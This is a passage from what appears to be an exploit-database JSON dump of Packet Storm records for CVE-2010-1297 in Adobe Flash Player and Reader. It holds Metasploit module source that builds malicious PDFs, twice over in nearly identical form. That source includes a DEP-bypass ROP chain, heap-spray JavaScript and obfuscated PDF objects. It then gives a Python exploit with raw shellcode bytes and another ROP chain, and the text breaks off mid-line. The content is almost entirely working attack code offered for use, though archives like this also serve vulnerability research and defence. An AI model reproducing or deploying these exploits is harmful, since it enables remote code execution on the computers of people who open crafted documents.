\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; \n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); \n#{var_b} += #{var_shellcode}; \n#{var_b} += #{var_c}; \n#{var_d} = #{var_b}.substring(0, #{var_s}/2); \nwhile(#{var_d}.length < 0x80000) 
#{var_d} += #{var_d}; \n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); \nvar #{var_4} = new Array(); \nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\"; \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(swf, js) \n \nswf_name = rand_text_alpha(8 + rand(8)) + \".swf\" \n \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? 
\npdf = \"%PDF-1.5\" << eol \n#pdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog\") \npdf << nObfu(\"/Pages \") << ioRef(3) \npdf << nObfu(\"/OpenAction \") << ioRef(5) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) \npdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# swf annotation object \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\") \npdf << nObfu(\"/Rect [20 20 187 69] \") \npdf << nObfu(\"/RichMediaSettings \") << ioRef(8) \npdf << nObfu(\"/RichMediaContent \") << ioRef(9) \npdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media settings \nxref << pdf.length \npdf << ioDef(8) \npdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\") \npdf << nObfu(\"/Activation \") << ioRef(10) \npdf << nObfu(\"/Deactivation \") << ioRef(11) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media content \nxref << pdf.length \npdf << ioDef(9) \npdf << nObfu(\"<</Type/RichMediaContent\") \npdf << nObfu(\"/Assets \") << ioRef(12) \npdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\" \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich 
media activation / deactivation \nxref << pdf.length \npdf << ioDef(10) \npdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\") \npdf << eol << endobj \n \nxref << pdf.length \npdf << ioDef(11) \npdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\") \npdf << eol << endobj \n \n# rich media assets \nxref << pdf.length \npdf << ioDef(12) \npdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# swf embedded file ref \nxref << pdf.length \npdf << ioDef(13) \npdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\") \npdf << eol << endobj \n \n# rich media configuration \nxref << pdf.length \npdf << ioDef(14) \npdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\") \npdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# rich media instance \nxref << pdf.length \npdf << ioDef(15) \npdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\") \npdf << nObfu(\"/Asset \") << ioRef(13) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# swf stream \n# NOTE: This data is already compressed, no need to compress it again... 
\nxref << pdf.length \npdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol \npdf << \"stream\" << eol \npdf << swf << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/90665/windows-browser-adobe_flashplayer_newfunction.rb.txt"}, {"lastseen": "2016-12-05T22:15:06", "description": "", "published": "2010-06-15T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player newfucntion Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-15T00:00:00", "id": "PACKETSTORM:90664", "href": "https://packetstormsecurity.com/files/90664/Adobe-Flash-Player-newfucntion-Invalid-Pointer-Use.html", "sourceData": "`## \n# $Id: adobe_flashplayer_newfunction.rb 9477 2010-06-10 20:55:17Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use', \n'Description' => %q{ \nThis module exploits a vulnerability in the DoABC tag handling within \nversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also \nvulnerable, as are any other applications that may embed Flash player. \n \nArbitrary code execution is achieved by embedding a specially crafted Flash \nmovie into a PDF document. An AcroJS heap spray is used in order to ensure \nthat the memory used by the invalid pointer issue is controlled. \n \nNOTE: This module uses a similar DEP bypass method to that used within the \nadobe_libtiff module. This method is unlikely to work across various \nWindows versions due to the hardcoded syscall number. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Found being openly exploited \n'jduck' # Metasploit version \n], \n'Version' => '$Revision: 9477 $', \n'References' => \n[ \n['CVE', '2010-1297'], \n['OSVDB', '65141'], \n['BID', '40586'], \n['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'], \n# For SWF->PDF embedding \n['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd \n# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Jun 04 2010', 
\n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \nend \n \ndef exploit \nswf_data = make_swf() \njs_data = make_js(payload.encoded) \n \n# Create the pdf \npdf = make_pdf(swf_data, js_data) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \ndef make_swf \n# load the static swf file \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" ) \nfd = File.open( path, \"rb\" ) \nswf_data = fd.read(fd.stat.size) \nfd.close \nswf_data \nend \n \ndef make_js(encoded_payload) \n \n# The following executes a ret2lib using BIB.dll \n# The effect is to bypass DEP and execute the shellcode in an indirect way \nstack_data = [ \n0xc0c0c0c, \n0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret \n0xcccccccc, \n0x70048ef, # xchg eax,esp / ret \n0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] \n0xcccccccc, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009033, # ret 0x18 \n0x7009084, # ret \n0xc0c0c0c, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7001599, # pop ebp / ret \n0x10124, \n0x70072f7, # pop eax / ret \n0x10104, \n0x70015bb, # pop ecx / ret \n0x1000, \n0x700154d, # mov [eax], ecx / ret \n0x70015bb, # pop ecx / ret \n0x7ffe0300, # -- location of KiFastSystemCall \n0x7007fb2, # mov eax, [ecx] / ret \n0x70015bb, # pop ecx / ret \n0x10011, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70015bb, # pop ecx / ret \n0x10100, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70072f7, # pop eax / ret \n0x10011, \n0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) 
\n0x7005c54, # pop esi / add esp,0x14 / ret \n0xffffffff, \n0x10100, \n0x0, \n0x10104, \n0x1000, \n0x40, \n# The next bit effectively copies data from the interleaved stack to the memory \n# pointed to by eax \n# The data copied is: \n# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83 \n# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff \n# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90 \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x70015bb, # pop ecx / ret \n0x9054905a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5815eb5a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x18891a8b, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x8304c083, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xfb8104c2, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xc0c0c0c, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5ebee75, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xffffe6e8, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x909090ff, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90ffffff, \n0x700154d, # mov [eax], ecx / ret \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x700112f # call eax -- (execute stub to transition to full shellcode) \n].pack('V*') \n \nvar_unescape = 
rand_text_alpha(rand(100) + 1) \nvar_shellcode = rand_text_alpha(rand(100) + 1) \n \nvar_start = rand_text_alpha(rand(100) + 1) \n \nvar_s = 0x10000 \nvar_c = rand_text_alpha(rand(100) + 1) \nvar_b = rand_text_alpha(rand(100) + 1) \nvar_d = rand_text_alpha(rand(100) + 1) \nvar_3 = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(100) + 1) \nvar_4 = rand_text_alpha(rand(100) + 1) \n \npayload_buf = '' \npayload_buf << stack_data \npayload_buf << encoded_payload \n \nescaped_payload = Rex::Text.to_unescape(payload_buf) \n \njs = %Q| \nvar #{var_unescape} = unescape; \nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); \nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" ); \nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; \n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); \n#{var_b} += #{var_shellcode}; \n#{var_b} += #{var_c}; \n#{var_d} = #{var_b}.substring(0, #{var_s}/2); \nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; \n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); \nvar #{var_4} = new Array(); \nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\"; \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(swf, js) \n \nswf_name = 
rand_text_alpha(8 + rand(8)) + \".swf\" \n \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \n#pdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog\") \npdf << nObfu(\"/Pages \") << ioRef(3) \npdf << nObfu(\"/OpenAction \") << ioRef(5) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) \npdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# swf annotation object \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\") \npdf << nObfu(\"/Rect [20 20 187 69] \") \npdf << nObfu(\"/RichMediaSettings \") << ioRef(8) \npdf << nObfu(\"/RichMediaContent \") << ioRef(9) \npdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media settings \nxref << pdf.length \npdf << ioDef(8) \npdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\") \npdf << nObfu(\"/Activation \") << ioRef(10) \npdf << nObfu(\"/Deactivation \") << ioRef(11) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media content \nxref << pdf.length \npdf << ioDef(9) \npdf << nObfu(\"<</Type/RichMediaContent\") \npdf << nObfu(\"/Assets \") << 
ioRef(12) \npdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\" \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media activation / deactivation \nxref << pdf.length \npdf << ioDef(10) \npdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\") \npdf << eol << endobj \n \nxref << pdf.length \npdf << ioDef(11) \npdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\") \npdf << eol << endobj \n \n# rich media assets \nxref << pdf.length \npdf << ioDef(12) \npdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# swf embedded file ref \nxref << pdf.length \npdf << ioDef(13) \npdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\") \npdf << eol << endobj \n \n# rich media configuration \nxref << pdf.length \npdf << ioDef(14) \npdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\") \npdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# rich media instance \nxref << pdf.length \npdf << ioDef(15) \npdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\") \npdf << nObfu(\"/Asset \") << ioRef(13) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# swf stream \n# NOTE: This data is already compressed, no need to compress it again... 
\nxref << pdf.length \npdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol \npdf << \"stream\" << eol \npdf << swf << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/90664/windows-fileformat-adobe_flashplayer_newfunction.rb.txt"}, {"lastseen": "2016-12-05T22:19:29", "description": "", "published": "2010-09-01T00:00:00", "type": "packetstorm", "title": "Month Of Abysssec Undisclosed Bugs - Adobe Reader / Flash Invalid Pointer", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-01T00:00:00", "id": "PACKETSTORM:93394", "href": "https://packetstormsecurity.com/files/93394/Month-Of-Abysssec-Undisclosed-Bugs-Adobe-Reader-Flash-Invalid-Pointer.html", "sourceData": "`''' \n__ __ ____ _ _ ____ \n| \\/ |/ __ \\ /\\ | | | | _ \\ \n| \\ / | | | | / \\ | | | | |_) | \n| |\\/| | | | |/ /\\ \\| | | | _ < Day 1 (Binary Analysis) \n| | | | |__| / ____ \\ |__| | |_) | \n|_| |_|\\____/_/ \\_\\____/|____/ \n \nhttp://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/ \nhttp://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz \n \nTitle : Adobe Acrobat Reader and Flash Player \u201cnewclass\u201d invalid pointer vulnerability \nAnalysis : http://www.abysssec.com \nVendor : http://www.adobe.com \nImpact : Ciritical \nContact : shahin [at] abysssec.com , info [at] 
abysssec.com \nTwitter : @abysssec \nCVE : CVE-2010-1297 \nMOAUB Number : MOAUB-01-BA \n''' \n \nimport sys \n \nclass PDF: \n \ndef __init__(self): \nself.xrefs = [] \nself.eol = '\\x0a' \nself.content = '' \nself.xrefs_offset = 0 \n \ndef header(self): \nself.content += '%PDF-1.6' + self.eol \n \ndef obj(self, obj_num, data,flag): \nself.xrefs.append(len(self.content)) \nself.content += '%d 0 obj' % obj_num \nif flag == 1: \nself.content += self.eol + '<< ' + data + ' >>' + self.eol \nelse: \nself.content += self.eol + data + self.eol \nself.content += 'endobj' + self.eol \n \ndef obj_SWFStream(self, obj_num, data, stream): \nself.xrefs.append(len(self.content)) \nself.content += '%d 0 obj' % obj_num \nself.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream)) \nself.content += ' >>' + self.eol \nself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol \nself.content += 'endobj' + self.eol \n \ndef obj_Stream(self, obj_num, data, stream): \nself.xrefs.append(len(self.content)) \nself.content += '%d 0 obj' % obj_num \nself.content += self.eol + '<< ' + data + '/Length %d' %len(stream) \nself.content += ' >>' + self.eol \nself.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol \nself.content += 'endobj' + self.eol \n \ndef ref(self, ref_num): \nreturn '%d 0 R' % ref_num \n \ndef xref(self): \nself.xrefs_offset = len(self.content) \nself.content += 'xref' + self.eol \nself.content += '0 %d' % (len(self.xrefs) + 1) \nself.content += self.eol \nself.content += '0000000000 65535 f' + self.eol \nfor i in self.xrefs: \nself.content += '%010d 00000 n' % i \nself.content += self.eol \n \ndef trailer(self): \nself.content += 'trailer' + self.eol \nself.content += '<< /Size %d' % (len(self.xrefs) + 1) \nself.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol \nself.content += 'startxref' + self.eol \nself.content += '%d' % self.xrefs_offset \nself.content += 
self.eol \nself.content += '%%EOF' \n \ndef generate(self): \nreturn self.content \n \n \n \n \nclass Exploit: \n \ndef convert_to_utf16(self, payload): \nenc_payload = '' \nfor i in range(0, len(payload), 2): \nnum = 0 \nfor j in range(0, 2): \nnum += (ord(payload[i + j]) & 0xff) << (j * 8) \nenc_payload += '%%u%04x' % num \nreturn enc_payload \n \ndef get_payload(self): \n# shellcode calc.exe \npayload =(\"\\x90\\x90\\x90\\x89\\xE5\\xD9\\xEE\\xD9\\x75\\xF4\\x5E\\x56\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" \n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5A\\x6A\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6B\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\" \n\"\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4A\\x49\\x4B\\x4C\\x4B\\x58\\x51\\x54\\x43\\x30\\x43\\x30\\x45\\x50\\x4C\\x4B\\x51\\x55\\x47\\x4C\\x4C\\x4B\\x43\\x4C\" \n\"\\x43\\x35\\x44\\x38\\x45\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x44\\x58\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x45\\x51\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\" \n\"\\x4B\\x43\\x31\\x4A\\x4E\\x46\\x51\\x49\\x50\\x4A\\x39\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x42\\x54\\x45\\x57\\x49\\x51\\x48\\x4A\\x44\\x4D\\x45\\x51\\x49\\x52\" \n\"\\x4A\\x4B\\x4B\\x44\\x47\\x4B\\x46\\x34\\x46\\x44\\x45\\x54\\x43\\x45\\x4A\\x45\\x4C\\x4B\\x51\\x4F\\x47\\x54\\x43\\x31\\x4A\\x4B\\x43\\x56\\x4C\\x4B\\x44\" \n\"\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C\\x4C\\x4B\\x43\\x31\\x4A\\x4B\\x4C\\x49\\x51\\x4C\\x47\\x54\\x45\\x54\" \n\"\\x48\\x43\\x51\\x4F\\x46\\x51\\x4C\\x36\\x43\\x50\\x46\\x36\\x45\\x34\\x4C\\x4B\\x50\\x46\\x50\\x30\\x4C\\x4B\\x47\\x30\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45\" \n\"\\x4C\\x4E\\x4D\\x4C\\x4B\\x42\\x48\\x44\\x48\\x4D\\x59\\x4B\\x48\\x4B\\x33\\x49\\x50\\x43\\x5A\\x46\\x30\\x45\\x38\\x4C\\x30\\x4C\\x4A\\x45\\x54\\x51\\x4F\" \n\"\\x42\\x48\\x4D\\x48\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x50\\x57\\x4B\\x4F\\x4A\\x47\\x43\\x53\\x47\\x4A\\x51\\x4C\\x50\\x57\\x51\\x59\\x50\\x4E\\x50\\x44\\x50\" 
\n\"\\x4F\\x46\\x37\\x50\\x53\\x51\\x4C\\x43\\x43\\x42\\x59\\x44\\x33\\x43\\x44\\x43\\x55\\x42\\x4D\\x50\\x33\\x50\\x32\\x51\\x4C\\x42\\x43\\x45\\x31\\x42\\x4C\" \n\"\\x42\\x43\\x46\\x4E\\x45\\x35\\x44\\x38\\x42\\x45\\x43\\x30\\x41\\x41\") \nreturn payload \n \n \ndef getSWF(self): \ntry: \n#swfFile = sys.argv[2] \nfdR = open('flash.swf', 'rb+') \nstrTotal = fdR.read() \nstr1 = strTotal[:88] \naddr1 = '\\x06\\xa6\\x17\\x30' # addr = 0c0c0c0c \nstr2 = strTotal[92:533] \n#*************************** Bypass DEP by VirtualProtect ******************************** \nrop = '' \nrop += \"\\x77\\xFA\\x44\\x7E\" # mov edi,esp ret 4 \nrop += \"\\x94\\x28\\xc2\\x77\" #add esp,20 pop ebp ret \nrop += \"AAAA\" #padding \nrop += \"\\xD4\\x1A\\x80\\x7C\" # VirtualProtect \nrop += \"BBBB\" # Ret Addr for VirtualProtect \nrop += \"CCCC\" # Param1 (lpAddress) \nrop += \"DDDD\" # Param2 (Size) \nrop += \"EEEE\" # Param3 (flNewProtect) \nrop += \"\\x10\\xB0\\xEF\\x77\" # Param4 (Writable Address) \nrop += \"AAAAAAAAAAAA\" #padding \nrop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret \nrop += \"AAAA\" #padding \nrop += \"\\xF2\\xE1\\x12\\x06\" #add eax,94 ret \nrop += \"\\x70\\xDC\\xEE\\x77\" #push esp pop ebp ret4 \nrop += \"\\x16\\x9A\\x94\\x7C\" #mov [ebp-30],eax ret \nrop += \"AAAA\" #padding \nrop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret \nrop += \"AAAA\" #padding \nrop += \"\\xF2\\xE1\\x12\\x06\" #add eax,94 ret \nrop += \"\\x79\\x9E\\x83\\x7C\" #mov [ebp-2c],eax ret \nrop += \"\\x27\\x56\\xEA\\x77\" #mov eax,6b3 ret \nrop += \"\\x14\\x83\\xE0\\x77\" #mov [ebp-28],eax ret \nrop += \"\\xB4\\x01\\xF2\\x77\" #xor eax,eax ret \nrop += \"\\x88\\x41\\x97\\x7C\" #add eax,40 pop ebp ret \nrop += \"AAAA\" #padding \nrop += \"\\x70\\xDC\\xEE\\x77\" #push esp pop ebp ret4 \nrop += \"\\xC0\\x9E\\xEF\\x77\" #mov [ebp-54],eax ret \nrop += \"AAAA\" #padding \nrop += \"\\xC2\\x4D\\xC3\\x77\" #mov eax,edi pop esi ret \nrop += \"AAAA\" #padding \nrop += \"\\xC1\\xF2\\xC1\\x77\" 
